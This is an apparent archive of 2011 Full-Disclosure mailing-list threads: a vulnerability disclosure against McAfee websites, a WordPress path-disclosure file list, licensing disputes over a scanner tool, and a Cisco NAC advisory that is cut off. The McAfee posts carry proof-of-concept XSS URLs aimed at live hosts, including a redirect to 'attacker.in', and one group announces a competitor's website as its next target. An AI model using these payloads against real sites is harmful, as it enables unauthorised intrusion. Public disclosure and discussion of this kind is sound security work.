http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
?
On Wed, Mar 30, 2011 at 1:49 PM, Benji m...@b3nji.com wrote:
I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111
(Plzdontxssme)
On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(
http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor - Ellen Messmer. Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:
http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:
http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:
http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:
http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:
http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:
http://download.mcafee.com/common/ssi/variables.asp
view-source:
http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:
http://download.mcafee.com/common/ssi/errHandler.asp
view-source:
http://download.mcafee.com/common/ssi/common_subs.asp
view-source:
http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:
http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo:
http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HTB22905: Path disclosure in Wordpress
With regards to the recent bugtrack advisory on WordPress DFA: Re: HTB22905: Path disclosure in Wordpress Ridiculous! I've been talking about this for some time, the actual list of vulnerable files follows: wp-admin\admin-functions.php wp-admin\includes\admin.php wp-admin\includes\class-ftp-pure.php wp-admin\includes\class-ftp-sockets.php wp-admin\includes\class-wp-filesystem-direct.php wp-admin\includes\class-wp-filesystem-ftpext.php wp-admin\includes\class-wp-filesystem-ftpsockets.php wp-admin\includes\class-wp-filesystem-ssh2.php wp-admin\includes\comment.php wp-admin\includes\continents-cities.php wp-admin\includes\file.php wp-admin\includes\media.php wp-admin\includes\misc.php wp-admin\includes\ms.php wp-admin\includes\nav-menu.php wp-admin\includes\plugin-install.php wp-admin\includes\plugin.php wp-admin\includes\schema.php wp-admin\includes\template.php wp-admin\includes\theme-install.php wp-admin\includes\update.php wp-admin\includes\upgrade.php wp-admin\includes\user.php wp-admin\maint\repair.php wp-admin\menu-header.php wp-admin\menu.php wp-admin\options-head.php wp-admin\upgrade-functions.php wp-config.php wp-content\themes\twentyten\404.php wp-content\themes\twentyten\archive.php wp-content\themes\twentyten\attachment.php wp-content\themes\twentyten\author.php wp-content\themes\twentyten\category.php wp-content\themes\twentyten\comments.php wp-content\themes\twentyten\footer.php wp-content\themes\twentyten\functions.php wp-content\themes\twentyten\header.php wp-content\themes\twentyten\loop.php wp-content\themes\twentyten\onecolumn-page.php wp-content\themes\twentyten\page.php wp-content\themes\twentyten\search.php wp-content\themes\twentyten\sidebar-footer.php wp-content\themes\twentyten\sidebar.php wp-content\themes\twentyten\single.php wp-content\themes\twentyten\tag.php wp-includes\Text\Diff\Engine\native.php wp-includes\Text\Diff\Engine\string.php wp-includes\Text\Diff\Engine\xdiff.php wp-includes\Text\Diff\Renderer\inline.php wp-includes\Text\Diff\Renderer.php wp-includes\Text\Diff.php wp-includes\cache.php wp-includes\canonical.php wp-includes\class-feed.php wp-includes\class-simplepie.php wp-includes\class-snoopy.php wp-includes\class.wp-scripts.php wp-includes\class.wp-styles.php wp-includes\classes.php wp-includes\comment-template.php wp-includes\default-embeds.php wp-includes\default-filters.php wp-includes\default-widgets.php wp-includes\feed-atom-comments.php wp-includes\feed-atom.php wp-includes\feed-rdf.php wp-includes\feed-rss.php wp-includes\feed-rss2-comments.php wp-includes\feed-rss2.php wp-includes\general-template.php wp-includes\js\tinymce\langs\wp-langs.php wp-includes\js\tinymce\plugins\spellchecker\classes\EnchantSpell.php wp-includes\js\tinymce\plugins\spellchecker\classes\GoogleSpell.php wp-includes\js\tinymce\plugins\spellchecker\classes\PSpell.php wp-includes\js\tinymce\plugins\spellchecker\classes\PSpellShell.php wp-includes\js\tinymce\plugins\spellchecker\config.php wp-includes\js\tinymce\wp-mce-help.php wp-includes\kses.php wp-includes\l10n.php wp-includes\media.php wp-includes\ms-default-constants.php wp-includes\ms-default-filters.php wp-includes\ms-functions.php wp-includes\ms-settings.php wp-includes\nav-menu-template.php wp-includes\post.php wp-includes\query.php wp-includes\registration-functions.php wp-includes\rss-functions.php wp-includes\rss.php wp-includes\script-loader.php wp-includes\shortcodes.php wp-includes\taxonomy.php wp-includes\template-loader.php wp-includes\theme-compat\comments-popup.php wp-includes\theme-compat\comments.php wp-includes\theme-compat\footer.php wp-includes\theme-compat\header.php wp-includes\theme-compat\sidebar.php wp-includes\theme.php wp-includes\update.php wp-includes\user.php wp-includes\vars.php wp-includes\widgets.php wp-includes\wp-db.php wp-includes\wp-diff.php wp-settings.php That's some 30%-40% of all Wordpress files (depending on Wordpress install). I considered publishing this formally but... http://codex.wordpress.org/Security_FAQ See the 5th clause. If they can't be bothered with proper coding practices, I won't bother arguing what the meaning behind optimal security is either. For the record, keep in mind that hiding the said errors from output still doesn't stop them from being logged in the infamous error_log, which of course can be fixed by (un)setting yet another config. Seems useless to point out that security is about not shooting at your own feet as opposed to doing so and mending them later on. EOR Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
The INSECT Pro version hosted on that site is really old, from what I see is the version 1.1 and is not an official version, on the other side. INSECT Pro 2.5 is free and we only ask for a donation to show interest. The amount of the donation is not fixed. We want to say thanks to the community that allows us to further develop and thank to you we can afford a decent hosting so you can download updates directly from our site. Just as there are trolls on this list going around and insulting everyone, too many people are worthwhile and that is why we continue learning and developing for this project. Greetings! Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned 2011/3/30 Quentin Ducas quentin@gmail.com: It is still available at http://insectpro.highprofilesite.com/ Free, no donation required. Quentin 2011/3/30 runlvl run...@gmail.com: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! Insect Pro 2.5 is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities. We’re always working to improve Insect Pro and now the users obtain a new feature: A fully automated active web application security reconnaissance tool. Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA We invite you to take a visual tour where you can find screenshots and videos, visit us now at http://www.insecurityresearch.com There is no fixed price to get a copy, you can obtain the full version by making a minimum donation to keep us coding. We are really thankful with the community! Get it now from: http://www.insecurityresearch.com Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HTB22905: Path disclosure in Wordpress
By the way, I didn't see this mentioned anywhere (yet); since there are so many unprotected files, one can easily detect the wordpress version by comparing error line numbers. On Wed, Mar 30, 2011 at 4:39 PM, Christian Sciberras uuf6...@gmail.com wrote: With regards to the recent bugtrack advisory on WordPress DFA: Re: HTB22905: Path disclosure in Wordpress Ridiculous! I've been talking about this for some time, the actual list of vulnerable files follows: wp-admin\admin-functions.php wp-admin\includes\admin.php wp-admin\includes\class-ftp-pure.php wp-admin\includes\class-ftp-sockets.php wp-admin\includes\class-wp-filesystem-direct.php wp-admin\includes\class-wp-filesystem-ftpext.php wp-admin\includes\class-wp-filesystem-ftpsockets.php wp-admin\includes\class-wp-filesystem-ssh2.php wp-admin\includes\comment.php wp-admin\includes\continents-cities.php wp-admin\includes\file.php wp-admin\includes\media.php wp-admin\includes\misc.php wp-admin\includes\ms.php wp-admin\includes\nav-menu.php wp-admin\includes\plugin-install.php wp-admin\includes\plugin.php wp-admin\includes\schema.php wp-admin\includes\template.php wp-admin\includes\theme-install.php wp-admin\includes\update.php wp-admin\includes\upgrade.php wp-admin\includes\user.php wp-admin\maint\repair.php wp-admin\menu-header.php wp-admin\menu.php wp-admin\options-head.php wp-admin\upgrade-functions.php wp-config.php wp-content\themes\twentyten\404.php wp-content\themes\twentyten\archive.php wp-content\themes\twentyten\attachment.php wp-content\themes\twentyten\author.php wp-content\themes\twentyten\category.php wp-content\themes\twentyten\comments.php wp-content\themes\twentyten\footer.php wp-content\themes\twentyten\functions.php wp-content\themes\twentyten\header.php wp-content\themes\twentyten\loop.php wp-content\themes\twentyten\onecolumn-page.php wp-content\themes\twentyten\page.php wp-content\themes\twentyten\search.php wp-content\themes\twentyten\sidebar-footer.php wp-content\themes\twentyten\sidebar.php wp-content\themes\twentyten\single.php wp-content\themes\twentyten\tag.php wp-includes\Text\Diff\Engine\native.php wp-includes\Text\Diff\Engine\string.php wp-includes\Text\Diff\Engine\xdiff.php wp-includes\Text\Diff\Renderer\inline.php wp-includes\Text\Diff\Renderer.php wp-includes\Text\Diff.php wp-includes\cache.php wp-includes\canonical.php wp-includes\class-feed.php wp-includes\class-simplepie.php wp-includes\class-snoopy.php wp-includes\class.wp-scripts.php wp-includes\class.wp-styles.php wp-includes\classes.php wp-includes\comment-template.php wp-includes\default-embeds.php wp-includes\default-filters.php wp-includes\default-widgets.php wp-includes\feed-atom-comments.php wp-includes\feed-atom.php wp-includes\feed-rdf.php wp-includes\feed-rss.php wp-includes\feed-rss2-comments.php wp-includes\feed-rss2.php wp-includes\general-template.php wp-includes\js\tinymce\langs\wp-langs.php wp-includes\js\tinymce\plugins\spellchecker\classes\EnchantSpell.php wp-includes\js\tinymce\plugins\spellchecker\classes\GoogleSpell.php wp-includes\js\tinymce\plugins\spellchecker\classes\PSpell.php wp-includes\js\tinymce\plugins\spellchecker\classes\PSpellShell.php wp-includes\js\tinymce\plugins\spellchecker\config.php wp-includes\js\tinymce\wp-mce-help.php wp-includes\kses.php wp-includes\l10n.php wp-includes\media.php wp-includes\ms-default-constants.php wp-includes\ms-default-filters.php wp-includes\ms-functions.php wp-includes\ms-settings.php wp-includes\nav-menu-template.php wp-includes\post.php wp-includes\query.php wp-includes\registration-functions.php wp-includes\rss-functions.php wp-includes\rss.php wp-includes\script-loader.php wp-includes\shortcodes.php wp-includes\taxonomy.php wp-includes\template-loader.php wp-includes\theme-compat\comments-popup.php wp-includes\theme-compat\comments.php wp-includes\theme-compat\footer.php wp-includes\theme-compat\header.php wp-includes\theme-compat\sidebar.php wp-includes\theme.php wp-includes\update.php wp-includes\user.php wp-includes\vars.php wp-includes\widgets.php wp-includes\wp-db.php wp-includes\wp-diff.php wp-settings.php That's some 30%-40% of all Wordpress files (depending on Wordpress install). I considered publishing this formally but... http://codex.wordpress.org/Security_FAQ See the 5th clause. If they can't be bothered with proper coding practices, I won't bother arguing what the meaning behind optimal security is either. For the record, keep in mind that hiding the said errors from output still doesn't stop them from being logged in the infamous error_log, which of course can be fixed by (un)setting yet another config. Seems useless to point out that security is about not shooting at your own feet as opposed to doing so and mending them later on. EOR Chris. ___
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
The amount of the donation is not fixed. Can I make a 0 euro donation? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
The amount of the donation is not fixed. Can I make a 0 euro donation? Are you bored or stupid, or both? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
why do we need installer then? distribute that tool as single
executable.
Because without the installer, it can't try to monetize the install by
installing search toolbars! (It's nice enough to continue the install if you
reject their terms, though.)
On 2011-03-29, at 13:13, Jo Galara wrote:
How does it work? Bruteforce?
Yes, but... well, JAD does a better job of explaining than I possibly could:
Runtime rt = Runtime.getRuntime();
String str = 7z.exe x ;
str = str + \ + _filepath + \ ;
str = str + -p\ + pwd + \ ;
str = str + -o\ + _destpath + \;
str = str + -y;
System.out.println(str);
Process p = rt.exec(str);
p.waitFor();
if (p.exitValue() == 0)
{
ret = true;
}
That's funny (i.e. pathetic).
A quick search of the tool's website doesn't reveal any links to the
7-zip website. I'm not going to bother to download this tool, since a
1-line shell script would accomplish the same thing, but if 7-zip
isn't linked to in the accompanying documentation, then that would be
a violation of the LGPL. From 7-zip's FAQ:
Can I use the EXE or DLL files from 7-Zip in a Commercial Application?
Yes, but you are required to specify in your documentation (1) that
you used parts of the 7-Zip program, (2) that 7-Zip is licensed under
the GNU LGPL license and (3) you must give a link to www.7-zip.org,
where the source code can be found.
tim
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Neither, I was curious as to what he'd say, and I was pleasantly surprised (offered to send me a copy). Calm down kid. On 3/30/11, n...@myproxylists.com n...@myproxylists.com wrote: The amount of the donation is not fixed. Can I make a 0 euro donation? Are you bored or stupid, or both? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Let's see here... As an ethical hacker group, you don't like being criticized
by someone as engaging in illegal activities, so you announce on a public site
that you are going to attack the company? Brilliant.
t
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical
Hacker Group
Sent: Wednesday, March 30, 2011 5:44 AM
To: Pablo Ximenes
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be found
through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network World
News editor - Ellen Messmer. Thus, the next target is Cenzic web site. Let's
see how strong the Kung-Fu of Cenzic HailStorm scanner is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
ecurity-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
ocation.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
kiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/app
common.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/par
tnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
p
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
ontrols.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productCompa
rison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_fo
ot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_i
nfoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks
-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-de
facement.html
host-extract: http://code.google.com/p/host-extract/
Demo:
http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned
-from-a-security-breach
#yehg [2011-03-27]
___
Full-Disclosure - We
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Thor, that's just a marketing adjective.
Just like when you're asked to buy authentic replica r0lex watches.
Cheers,
Chris.
On Wed, Mar 30, 2011 at 5:22 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
Let's see here... As an ethical hacker group, you don't like being
criticized by someone as engaging in illegal activities, so you announce on a
public site that you are going to attack the company? Brilliant.
t
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical
Hacker Group
Sent: Wednesday, March 30, 2011 5:44 AM
To: Pablo Ximenes
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
According to xssed.com, there are two remaining XSS issues:
https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
You guys know our disclosed issues are very simple and can easily be found
through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
However, it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network World
News editor - Ellen Messmer. Thus, the next target is Cenzic web site. Let's
see how strong the Kung-Fu of Cenzic HailStorm scanner is.
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
FIY
http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
ecurity-Holes
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/28 Pablo Ximenes pa...@ximen.es:
blog post about this: http://ximen.es/?p=469
Please, don't throw stones at me.
[]'s
Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes
2011/3/27 YGN Ethical Hacker Group li...@yehg.net
Vulnerabilities in *McAfee.com
1. VULNERABILITY DESCRIPTION
- Cross Site Scripting
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
ocation.replace('attacker.in')
- Information Disclosure Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js
($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)
- Information Disclosure Source Code Disclosure:
view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
kiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/app
common.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/par
tnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
p
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
ontrols.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productCompa
rison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_fo
ot_us.asp
2. RECOMMENDATION
- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information
leakage
3. VENDOR
McAfee Inc
http://www.mcafee.com
4. DISCLOSURE TIME-LINE
2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed
5. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_i
nfoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks
-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-de
facement.html
host-extract: http://code.google.com/p/host-extract/
Demo:
http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn:
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
runlvl wrote: The INSECT Pro version hosted on that site is really old, from what I see is the version 1.1 and is not an official version, on the other side. The version made available is older (2.0 version, not 1.1 as you claim), but it is an official version, or at least what you gave me as an official download. There is also a recompressed version with the same content for a smaller download size for people that want that. As I said before, I'll happily update the version hosted there to the newest version if you allow it. My download password stopped working at the time of the next release, and emails about it have been ignored. INSECT Pro 2.5 is free and we only ask for a donation to show interest. The amount of the donation is not fixed. Please, let's not start this up again. Your page clearly says you are buying a license, and has removed all comments about it being free. The licenses of the software you include (Metasploit and Skipfish) allow this, and there's no benefit to you making the claim of the software being free. You may or may not offer some licenses gratis, but that's different from the software being free in the sense that most people understand. If it's free, I'll happily host newer versions for free download for everyone. Otherwise, stick with the license language you have on your website. To be clear, I have no problem with you offering licenses for sale, offering licenses for donations, or making software freely available. Just do the one you are claiming to do please. -- | Steven Pinkham, Security Consultant| | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Maybe you can fix my login/password for insecurityresearch.com as per my earlier mail. Customer Service Marketing, right? :p On Wed, Mar 30, 2011 at 3:44 PM, runlvl run...@gmail.com wrote: The INSECT Pro version hosted on that site is really old, from what I see is the version 1.1 and is not an official version, on the other side. INSECT Pro 2.5 is free and we only ask for a donation to show interest. The amount of the donation is not fixed. We want to say thanks to the community that allows us to further develop and thank to you we can afford a decent hosting so you can download updates directly from our site. Just as there are trolls on this list going around and insulting everyone, too many people are worthwhile and that is why we continue learning and developing for this project. Greetings! Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned 2011/3/30 Quentin Ducas quentin@gmail.com: It is still available at http://insectpro.highprofilesite.com/ Free, no donation required. Quentin 2011/3/30 runlvl run...@gmail.com: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! Insect Pro 2.5 is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities. We’re always working to improve Insect Pro and now the users obtain a new feature: A fully automated active web application security reconnaissance tool. Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA We invite you to take a visual tour where you can find screenshots and videos, visit us now at http://www.insecurityresearch.com There is no fixed price to get a copy, you can obtain the full version by making a minimum donation to keep us coding. We are really thankful with the community! Get it now from: http://www.insecurityresearch.com Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- I’m a hot-wired, heat seeking, warm-hearted cool customer, voice activated and bio-degradable. I interface with my database, my database is in cyberspace, so I’m interactive, I’m hyperactive and from time to time I’m radioactive. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Network Access Control Guest Server System Software Authentication Bypass Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco Network Access Control Guest Server System Software Authentication Bypass Vulnerability Advisory ID: cisco-sa-20110330-nac Revison 1.0 For Public Release 2011 March 30 1600 UTC (GMT) +- Summary === Cisco Network Access Control (NAC) Guest Server system software contains a vulnerability in the RADIUS authentication software that may allow an unauthenticated user to access the protected network. Cisco has released free software updates that address this vulnerability. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110330-nac.shtml Affected Products = Cisco NAC Guest Server provides guest policy enforcement to Cisco NAC appliances and Cisco Wireless LAN Controllers, where guest policies are enforced. Vulnerable Products +-- This vulnerability affects all versions of NAC Guest Server software prior to software version 2.0.3. The software version is displayed on the login page of the web server. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by this vulnerability. Details === The Cisco NAC Guest Server system software contains a vulnerability in the configuration file of the RADIUS 